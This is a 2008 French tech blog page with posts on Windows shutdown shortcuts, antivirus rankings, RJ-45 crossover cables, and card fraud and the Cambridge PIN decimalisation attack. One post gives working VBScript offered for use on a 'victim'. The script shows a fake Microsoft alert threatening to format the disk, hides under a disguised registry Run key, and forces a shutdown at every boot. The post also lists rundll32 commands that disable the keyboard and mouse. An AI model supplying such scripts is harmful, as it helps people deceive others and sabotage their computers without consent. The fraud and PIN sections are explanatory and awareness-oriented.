Powered By Blogger

Rechercher sur ce blogue

dimanche 30 mars 2008

Arrêter l'ordinateur rapidement,avec un raccourci

Arrêter rapidement l'ordinateur Pour arrêter rapidement l'ordinateur grâce à un raccourci avec

Windows 95, 98, Me :
Cliquez avec le bouton droit de la souris sur un emplacement vide du bureau. Dans le menu contextuel, cliquez sur Nouveau puis Raccourci. Dans le champ Ligne de comande, saisissez Rundll32.exe user,exitwindows puis cliquez sur Suivant. Dans le champ Nom, saisissez le nom du raccourci puis cliquez sur Terminer.

Pour arrêter rapidement l'ordinateur grâce à un raccourci avec Windows XP :
Cliquez avec le bouton droit de la souris sur un emplacement vide du bureau. Dans le menu contextuel, cliquez sur Nouveau puis Raccourci. Dans le champ Cible, saisissez Shutdown -s -t 01 (01 est le délai en secondes avant fermeture) puis cliquez sur Suivant. Dans le champ Nom, saisissez le nom du raccourci puis cliquez sur Terminer. Pour Windows XP, il existe aussi les paramètres -i (déconnecte l'utilisateur actuel), -f (ferme tous les programmes) et -c "message" (affiche un message de 127 caractères au maximum).



Pour win98 j'ai trouvé un truc infaillible et très killer,ça peut s'appliquer a fermer un pc ou même un clavier ou souris pour imiter un logiciel de controle parental. Il existe un truc dans Windows qui s`appelle WSH (Windows Scripting Host). Le WSH supporte les VBScript, les JScript, Perl et Python. Pour le WSH il n`y a pas besoin d`avoir des compilateurs... il faut juste avoir dans quoi ecrire un texte. On va prendre le Blocnote. Ovrez le Blocnote et inscrivez: Test = MsgBox("Votre systeme a ete declare comme illegal par les services de Microsoft. Votre disque dur va etre formate pour cette raison. Si vous voulez formater votre disque dur tout de suite appuyez sur Oui. Si vous voulez d`abord sauvgarder tous les fichiers et formater le disque dur apres redemarage de votre ordinateur appuyez sur Non", 20, "Erreur du Systeme") Sauvegardez tout ca sous le nom de message.vsb (extension .vsb et pas .txt) et lancez ce fichier. Vous pouvez effectuer cette operation sur n`importe quel ordi et donc quand c`est le bon moment ecrivez qq chose de ce genrde et sauvgardez le. Si un de vos amis/ennemis voit ca sur son ecran devinez ce qu`il va faire...Mais comment va-t-il lancer le fichier? Pour ca allez dans le registre et dans HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run creez une valeur texte (String Value) et ecrivez qq chose comme internatdll32 et dans le 2eme parametre inscrivez l`endroit ou ce trouve le script (ex: C:\Program Files\message.vbs). Voila maintenant aprez avoir redemare le PC le message s`affichera. Mais ca fera un peu suspect et la victime risque de ne pas y croire... Alors on va faire en sorte que ca ne se lance que apres une certaine date.
Pour cela inscrivez avant le message:
If Day(now)>15Then
(ici il y a le message)
End If


Maintenant le message ne s`affichera plus que apres le 15 de chaque mois. Mais j`ai un sentiment que ca vous suffit pas... Vous avez raison. Grace au code suivant l`ordi de la victime va s`etaindre a chaque fois qu`il lancera Windaube:
Sub sheff (Hack, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(Hack, Wait)
End Sub
Call sheff("rundll32 shell32,SHExitWindowsEx - 1", True)

Et tout ca on le met dans le registre aussi pour que ca marche a chaque demarage (sauf en mode sans echec). Comme vous avez peut-etre remarque que apres la fonction Call entre parantheses il y a une commande que vous pouvez entrer dans "Executer" (Boutton Demarer\Executer). Donc si vous mettez Call sheff("C:\Windows\Calc.exe", True) ca va lancer la calculette.... A vous d`en disposer. Voici d`autres commandes interessantes:
rundll32 keyboard, disable : eteint le cavier
rundll32 mouse, disable : eteint la souris
rundll32 user, swapmousebutton : change souris pour droitiers/gauchers
rundll32 krnl386.exe , exit kernel : sort de windaube sans rien dire

Les moteurs de recherches et l'ascension de Google

Ce qu'ont disaient en 2003............................Google,il est incomplet et travaille pas comme Copernic qui est payant.
Altalavista peut être ;o)
Et aussi Project Avalon: http://www.yale.edu/lawweb/avalon/sept_11/sept_11.htm Ainsi que Gobox qui gère plusieurs moteurs dont google. Le meilleur moteur n'existe pas ,car ont sait que environ 90% du web est caché ou inacessible pour Google,car ça demande un abonnement pour y accéder,comme les sites de cie ou certains webzines.

Aujourd'hui Google est encore le King.

Résultat de Test pour savoir lequel des antivirus est le meilleur

Un test de 2004,mais qui nous donne une indication de la vulnérabilité des antivirus qui deviennent désuets avec le temps.


J'ai lu des test du magazine windows news,voici leurs classements. Kaspersky(produit Russe,Da Da.....) ,aucun virus ne lui échappe.Certains disent que cet antivirus se met a jour 12 hrs avant les autres ,car selon le fuseau horaire des Russes,ils auront déja eut un antidote avant l'Amérique. Panda titanium,est nez a nez avec Kaspersky. C'est 2 la font une très bonne job,surtout pour les virus de boot.C'est sûr que certaines cartes mères modernes incluent une protection contre les virus de boot,empêchant toute écriture sur le secteur de démarrage. Ensuite il y a Panda platinum Norton Antivirus 2004; les fichiers scr contaminés ne sont pas facilement détectés. Sophos 3.75 ; détecte 75% des virus. AVG 7.0 ; détecte difficilement les fichiers contaminés .com , les macro,les scripts,les exe.A part ça mettons qui va bien........mal??? Bit Defender standard edition 7 ; les anciens virus sont mal détectés. AntiVirus kit pro 11.0 ; pro que par le nom. McAfee 2004 ; en 9ième position,...huuuummm,le moteur d'analyse est peu performant et approuve a l'accasion l'ouverture de fichiers infectés. Toujours selon les test de windows news. F-Secure 2003 ; il est très lent et ça prend 512 mo de ram minimum,il est lent car même l'affichage des menus contextuels s'effectue apres un temps de pause!Et beaucoup de virus sont indétectés. Alors AVG c'est vraiment pourrit ,personnes ne devraient utiliser cette antivirus minable a mon humble avis !!!

En 2008,NOD32 ,AVAST,et kaspersky sont dure a battre,oubliez les AVG gratos.

RJ-45 croisé ?

La difference entre un croisé et un straight est dans la maniere de placer les fils dans la prise RJ-45 (comme de telephone, mais plus gros) Le principe est que, pour un fils croisé, les fils d'envoie et de receptions doivent être inversé pour que les deux ordinateurs, quand branché directement, puissent recevoir ce que l'autre envoire. Alors on viens inverser les branches 1 et 2 (send) avec 3 et 6 (receive).

les quand il y a 2 ordi branché sur un hub ou sur un router c'est que le hub ou le router font la job de croiser par eux même, dans leur circuit, les connexions, c'est pour ça que vous avez besoin que de fils straight dans ces cas là.


Si on utilise pas de concentrateur (connexion de 2 stations) ou pour connecter 2 concentrateurs entre-eux, les fils doivent être de type câble croisés comme ci-dessous. Vous devez respecter les polarités et les paires doivent être appariées.
image
Tu croise seulement: Le 1 (selon sa couleur)deviens = le 3(a l'autre extrémité du fil) le 2 = le 6 le 3 = 1 le 6 = 2 Le reste des fils reste dans le même alignement. C'est ce qui fait qu'il y a transmission et réception des data. Selon le dessin,les 2 colonnes de chiffres représente les 2 extrémités du même fil.

Fabriquer un câble croisé(Dans une autres explication,ci-dessous) Pour fabriquer un câble RJ45 croisé, il suffit d'acheter câble droit, de le sectionner en son milieu, puis de reconnecter les fils selon le site ici en bas: http://www.commentcamarche.net/elec/rj45croise.php3 Et un autre site complet: http://www.ac-nancy-metz.fr/services/genres/cables.htm

samedi 29 mars 2008

Autopsie D'un "Arnaque sur les cartes de crédits", en 2004

Maintenant que la poussière est tombée;Ont peut plus en parler maintenant!

Ne jamais divulgué des infos par téléphone,a n'importe qui ! Cette info est a titre d'information pour éviter les arnaques. "Arnaque sur les cartes de crédits":Tel était le titre de l'article dernièrement dans le journal de mtl de cette semaine,ont parle de 146,310 cartes utilisées frauduleusement pour un montant de 139 Millions$.La tactique des Black hats consistait a se faire passer pour un employé du département de la fraude de Master card et annonce a sa victime que des achats anormaux sur sa carte se sont enregistrés.Ils demande a leurs victimes les 4 derniers chiffres a l'endos de leurs cartes.Ça permet aux fraudeurs tout simplement de pouvoir faire des prélèvements fantomes sur leurs cartes. Julie Brassard de Master cards Canada a expliqué que sa revenait a donner votre signature aux fraudeurs,car les 4 derniers chiffres sont un code de sécurité,donc qui permet de débarrer la carte ou d'obtenir le numéro de celle-ci . **********************************************************8 Mais ,depuis un an déja il y a eut pire,et ceci est répertorier sur le site de l'Université de Cambridge : http://www.cl.cam.ac.uk/TechReports/ Decimalisation table attacks for PIN cracking par Mike Bond, Piotr Zielinski,fichier en PDF (0.2 MB) Ça dit que plusieurs personnes se sont fait vidées partiellement leurs comptes de cartes de crédits ou débits(ATM). Les Banques ont rejettées la faute au laisser-aller des utilisateurs et dit que même si un criminel réussissait a copier le contenu de la bande magnétique d'la carte par un POS piraté sans avoir le code secret ont ne peut utiliser la carte de façon frauduleuse. Ces victimes en Angleterre, sont aller en justice contre Diner/Citybank pour démontrer que ce n'est pas impossible d'obtenir le code secret d'une carte ATM .Ils ont demander aux département de sécurité informatique et de cryptographie du "Computer Laboratory de l'University of Cambridge", de pondre un rapport sur la vulnérabilité du code pin secret d'une carte de crédit et ce en seulement 10 essais. C'est que la technologie utilisée était un système IBM 3624 implémenté par la Citybank,datant de 1980.Le problême est la!!! Ses vulnérabilités sont mises en évidence par 3 algorithmes dont le meilleur est capable de trouver un code secret au bout d'une dizaines d'essais ,face aux 5000 essais par attaque a force brute. Le code secret ,appelé aussi PIN , des cartes ATM et de crédits est de 4 chiffres. Les caractères numériques prévus sont de 10 chiffres (0 a 9)pour 10 exposant 4 : soit 10,000 combinaisons pour en avoir une de valide.Il faut detenir la moitié des combinaisons c.a.d. 5000 pour avoir 50% de probabilité de le trouver.En exécutant l'encrypted_pin_verify ,Mike Bond Étudiant de Cambridge , exploita la vulnérabilité des 4 premier chiffres cryptés d'une carte de crédit.

Ex. :
Pour un numéro fictif de carte 4556 2385 7753 2239
il sera crypté avec l'algorithme DES en 3F7C 2201 00CA 8AB3
si les 4 premier chiffres cryptés sont: 3F7C
Selon le tableau de conversion décimale: 0-1-2-3-4-5-6-7-8-9-A-B-C-D-E-F 0-1-2-3-4-5-6-7-8-9-0-1-2-3-4-5
le numéro 3F7C peut être aussi valable que le le numéro 3F72 ou le 3572
Donc,en envoyant un code PIN de valeur (****censuré)au HSM (Hardware security module),en seulement 10 essais il a pu trouver si les 10 chiffres décimaux a l'intérieur du code PIN de la carte sont présents. La Citybank s'est trouvée prise au dépourvu et réclama a la haute cours anglaise que les documents de M.Bond de Cambridge ne soient pas divulgués.Et que son système inadapté remontant au années 1980 soit révisé tout simplement. http://www.ftp.cl.cam.ac.uk/ftp/users/r ... _order.pdf La haute cours n'a pas pensé aux citoyens anglais qui confient leurs épargnes a la Citybank?Puisque les criminels connaissent déja probablement leur vulnérabilité,ceux qui resteraient dans l'obscurité du problême seraient seulement les citoyens fraudés incapables de démontrer devant une cours comment leur code PIN jalousement gardé a été utilisé. Source: H-magazine Solution: Devener un Human Firewall,en attendant que les systèmes de sécurité des Cartes Bancaire deviennent plus sécure !


Oui,et qui qui payera les $ 139 Millions.......C'est nous $$

La collecte d'info personnel va plus loin dans le cas des Taupes de la SAAQ,Raymond Turgeon écope cinq ans de pénitencier alors que sa complice, Ginette Martineau, est condamnée à trois ans de réclusion. Ils ont plaidé coupable à 25 accusations d'utilisation frauduleuse de renseignements confidentiels, alors qu'ils étaient à l'emploi d'un mandataire de la SAAQ dans l'est de Montréal. Et aussi ,le vol d'ordinateurs de l'Agence des douanes et du revenu du Canada (ADRC). Un des ordinateurs contenait des renseignements qui ont trait à des particuliers et des entreprises du domaine de la construction; il s'agit de noms, d'adresses et de numéros d'entreprise d'entrepreneurs et de sous-traitants. Certains dossiers contenaient aussi des numéros d'assurance sociale de particuliers. Et aux USA ;Ainsi, on apprend qu'au moins 595 ordinateurs portables et de bureau, appartenant au Navy's Pacific Command à Hawaï étaient potentiellement perdus ou compromis. Le rapport fait état de l'inaptitude du service à comptabiliser des centaines d'ordinateurs, dont certains contiennent des documents classifiés. Ainsi, on apprend qu'au moins 595 ordinateurs portables et de bureau, appartenant au Navy's Pacific Command à Hawaï étaient potentiellement perdus ou compromis. Le rapport fait état de l'inaptitude du service à comptabiliser des centaines d'ordinateurs, dont certains contiennent des documents classifiés. Deux ordinateurs portables, contenant des informations «top secret» sont disparus d'un site compartimenté d'informations classifiées (Sensitive Compartmented Information Facility) opéré par le U.S. Central Command à la base aérienne MacDill, à Tampa, en Floride. Ironiquement, la seule raison pour laquelle on a découvert la disparition de ces deux ordinateurs est que le secrétaire à la défense Donald Rumsfeld a ordonné aux enquêteurs de découvrir comment il y avait eu fuite de renseignements concernant des plans d'invasion de l'Iraq! le ministère de la justice à reconnu ne pas pouvoir retracer 400 ordinateurs portables et 775 armes appartenant au FBI et au Drug Enforcement Agency. De plus, il était alors impossible d'établir le niveau de classification de 317 ordinateurs appartenant au FBI. Comme quoi le gouvernement américain semble plus en mesure de déterminer les équipements que possède l'Iraq que ses propres forces sur le territoire américain…

Bientôt,les cartes de débits et crédits avec puces.................Wow,j'espère que ça va être plus sécure, pour nous!